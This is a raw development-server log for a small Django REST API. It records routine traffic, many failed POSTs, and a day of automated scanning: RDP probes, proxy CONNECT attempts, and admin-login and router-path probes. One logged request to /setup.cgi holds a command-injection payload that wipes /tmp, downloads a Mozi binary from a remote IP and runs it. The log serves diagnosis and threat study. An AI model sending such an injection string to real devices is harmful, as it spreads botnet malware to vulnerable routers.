[07/Dec/2020 22:06:38] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[07/Dec/2020 22:06:38] "  /*à     Cookie: mstshash=Administr" 400 -
[07/Dec/2020 23:29:57] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[07/Dec/2020 23:29:57] "  /*à     Cookie: mstshash=Administr" 400 -
[08/Dec/2020 00:45:31] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 00:45:31] "  /*à     Cookie: mstshash=Administr" 400 -
[08/Dec/2020 01:57:40] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 01:57:40] "  /*à     Cookie: mstshash=Administr" 400 -
[08/Dec/2020 03:04:19] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 03:04:19] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[08/Dec/2020 03:09:37] "GET / HTTP/1.1" 404 2131
[08/Dec/2020 04:10:06] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 04:10:06] "  /*à     Cookie: mstshash=Administr" 400 -
[08/Dec/2020 05:13:58] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 05:13:58] "  /*à     Cookie: mstshash=Administr" 400 -
[08/Dec/2020 05:28:39] code 400, message Bad HTTP/0.9 request type ('\x16\x03\x01\x00\x89\x01\x00\x00')
[08/Dec/2020 05:28:39] You're accessing the development server over HTTPS, but it only supports HTTP.

Not Found: /
[08/Dec/2020 05:29:07] "GET / HTTP/1.1" 404 2136
Not Found: /version
[08/Dec/2020 05:57:57] "GET /version HTTP/1.1" 404 2175
Not Found: /
[08/Dec/2020 05:57:58] "GET / HTTP/1.1" 404 2136
[08/Dec/2020 06:10:51] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 06:10:51] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /config/getuser
[08/Dec/2020 06:29:10] "GET /config/getuser?index=0 HTTP/1.1" 404 2204
[08/Dec/2020 07:06:13] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 07:06:13] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[08/Dec/2020 07:06:38] "GET / HTTP/1.1" 404 2136
Not Found: /
[08/Dec/2020 07:12:55] "GET / HTTP/1.1" 404 2136
Not Found: /
[08/Dec/2020 07:33:21] "GET / HTTP/1.1" 404 2136
Not Found: /actuator/health
[08/Dec/2020 07:40:13] "GET /actuator/health HTTP/1.1" 404 2199
[08/Dec/2020 07:56:05] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 07:56:05] "  /*à     Cookie: mstshash=Administr" 400 -
[08/Dec/2020 08:43:33] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[08/Dec/2020 08:43:33] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /http:/www.eliteproxyswitcher.com/proxyjudge.html
[08/Dec/2020 08:54:54] "GET http://www.eliteproxyswitcher.com/proxyjudge.html HTTP/1.1" 404 1770
Not Found: /authserver.mojang.com:443
[08/Dec/2020 09:09:14] "CONNECT authserver.mojang.com:443 HTTP/1.0" 404 1730
Not Found: /
[08/Dec/2020 09:29:31] "GET / HTTP/1.1" 404 2136
Not Found: /authserver.mojang.com:443
[08/Dec/2020 09:31:20] "CONNECT authserver.mojang.com:443 HTTP/1.1" 404 1698
Not Found: /authserver.mojang.com:443
[08/Dec/2020 09:31:20] "CONNECT authserver.mojang.com:443 HTTP/1.1" 404 1698
Not Found: /authserver.mojang.com:443
[08/Dec/2020 09:31:20] "CONNECT authserver.mojang.com:443 HTTP/1.1" 404 1698
Not Found: /authserver.mojang.com:443
[08/Dec/2020 09:31:20] "CONNECT authserver.mojang.com:443 HTTP/1.1" 404 1698
Not Found: /authserver.mojang.com:443
[08/Dec/2020 09:31:20] "CONNECT authserver.mojang.com:443 HTTP/1.1" 404 1698
Not Found: /auth.hulu.com:443
[08/Dec/2020 09:46:47] "CONNECT auth.hulu.com:443 HTTP/1.0" 404 1706
Not Found: /www.twitch.tv:443
[08/Dec/2020 09:50:06] "CONNECT www.twitch.tv:443 HTTP/1.0" 404 1706
Not Found: /
[08/Dec/2020 09:54:12] "GET / HTTP/1.0" 404 2173
Not Found: /
[08/Dec/2020 10:11:13] "GET / HTTP/1.0" 404 2136
Not Found: /boaform/admin/formLogin
[08/Dec/2020 10:30:40] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 2289
Not Found: /http:/nwilce.co.uk/abc.php
[08/Dec/2020 10:38:46] "GET http://nwilce.co.uk/abc.php HTTP/1.1" 404 1690
Not Found: /setup.cgi
[08/Dec/2020 11:05:35] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://110.35.149.195:2435/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 2383
Not Found: /
[08/Dec/2020 12:36:16] "GET / HTTP/1.0" 404 2173
Not Found: /http:/example.com/
[08/Dec/2020 13:04:34] "GET http://example.com/ HTTP/1.1" 404 1665
Not Found: /
[08/Dec/2020 13:33:02] "GET / HTTP/1.1" 404 2136
Not Found: /http:/example.com/
[08/Dec/2020 15:18:01] "GET http://example.com/ HTTP/1.1" 404 1665
Not Found: /http:/example.com/
[08/Dec/2020 15:29:43] "GET http://example.com/ HTTP/1.1" 404 1665
[08/Dec/2020 15:42:55] "GET /api/vi/ddobakis/ HTTP/1.1" 200 55478
[08/Dec/2020 15:42:55] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 304 0
[08/Dec/2020 15:42:55] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 304 0
[08/Dec/2020 15:42:55] "GET /static/rest_framework/css/default.css HTTP/1.1" 304 0
[08/Dec/2020 15:42:55] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 304 0
[08/Dec/2020 15:42:55] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 304 0
[08/Dec/2020 15:42:55] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 304 0
[08/Dec/2020 15:42:55] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 304 0
[08/Dec/2020 15:42:55] "GET /static/rest_framework/img/grid.png HTTP/1.1" 304 0
[08/Dec/2020 15:42:55] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 304 0
[08/Dec/2020 15:42:55] "GET /static/rest_framework/js/default.js HTTP/1.1" 304 0
[08/Dec/2020 15:42:55] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 304 0
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /manager/html
[08/Dec/2020 15:54:58] "GET /manager/html HTTP/1.1" 400 61530
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 279, in write
    self._write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer
[08/Dec/2020 15:54:58] "GET /manager/html HTTP/1.1" 500 59
----------------------------------------
Exception happened during processing of request from ('209.141.56.78', 51896)
Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 138, in run
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 279, in write
    self._write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 453, in _write
    result = self.stdout.write(data)
  File "/usr/lib/python3.6/socketserver.py", line 803, in write
    self._sock.sendall(b)
ConnectionResetError: [Errno 104] Connection reset by peer

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 141, in run
    self.handle_error()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 119, in handle_error
    super().handle_error()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 368, in handle_error
    self.finish_response()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 180, in finish_response
    self.write(data)
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 274, in write
    self.send_headers()
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 331, in send_headers
    if not self.origin_server or self.client_is_modern():
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 344, in client_is_modern
    return self.environ['SERVER_PROTOCOL'].upper() != 'HTTP/0.9'
TypeError: 'NoneType' object is not subscriptable

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 197, in handle_one_request
    handler.run(self.server.get_app())
  File "/usr/lib/python3.6/wsgiref/handlers.py", line 144, in run
    self.close()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 114, in close
    super().close()
  File "/usr/lib/python3.6/wsgiref/simple_server.py", line 35, in close
    self.status.split(' ',1)[0], self.bytes_sent
AttributeError: 'NoneType' object has no attribute 'split'
----------------------------------------
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:36:13] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:36:19] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:36:32] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:39:00] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:40:11] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:40:28] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:40:47] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:41:42] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:41:49] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:42:16] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:42:18] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:42:20] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:42:21] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:42:24] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:44:29] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:44:32] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:44:35] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:44:37] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:44:43] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:44:49] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 16:44:52] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Not Found: /http:/example.com/
[08/Dec/2020 17:02:01] "GET http://example.com/ HTTP/1.1" 404 1665
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:02:22] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:02:30] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:02:34] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:02:39] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:02:52] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:03:06] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:03:18] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:03:23] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:03:29] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:10:05] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:10:09] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
[08/Dec/2020 17:10:43] code 400, message Bad request syntax ('\x16\x03\x01\x00u\x01\x00\x00q\x03\x03\x12\x1fç\x8c)ÓÐÄ\x00öÆ\tCü]"Ði;\x0fIÂ\x9c`\x81YÆ½ïTÆ&\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\tÀ\x14À')
[08/Dec/2020 17:10:43] You're accessing the development server over HTTPS, but it only supports HTTP.

Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:21:33] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:21:37] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:21:40] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:32:06] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:32:08] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:32:09] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:32:11] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:32:13] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:32:15] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:32:17] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:32:23] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:32:25] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:32:27] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:38:46] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:38:48] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:38:49] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:38:50] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:38:51] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:38:53] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:38:55] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:38:56] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:38:58] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:38:59] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:00] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:02] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:03] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:04] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:08] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:11] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:14] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:16] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:20] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:20] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:27] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:28] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:29] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:30] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:32] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:33] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:34] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:35] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:36] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:38] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:39] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:40] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:39:41] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:27] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:27] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:29] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:31] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:32] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:33] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:34] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:36] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:37] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:38] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:39] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:41] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:42] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:45] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:40:47] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:34] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:36] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:37] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:38] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:39] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:40] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:41] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:42] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:43] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:45] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:46] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:47] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:48] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:41:51] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:42:11] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:07] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:18] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:19] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:20] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:22] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:23] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:24] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:25] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:26] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:27] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:28] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:29] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:31] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:44:57] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:46:47] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:46:49] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:46:50] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:46:52] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:46:53] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:46:55] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:46:57] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:46:59] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:47:00] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:47:02] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:47:03] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:47:05] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:47:07] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:47:08] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:47:09] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:47:10] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:47:55] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:47:57] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:47:58] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:00] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:01] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:02] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:03] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
Bad Request: /api/vi/ddobakis/
[08/Dec/2020 17:48:03] "POST /api/vi/ddobakis/ HTTP/1.1" 400 52
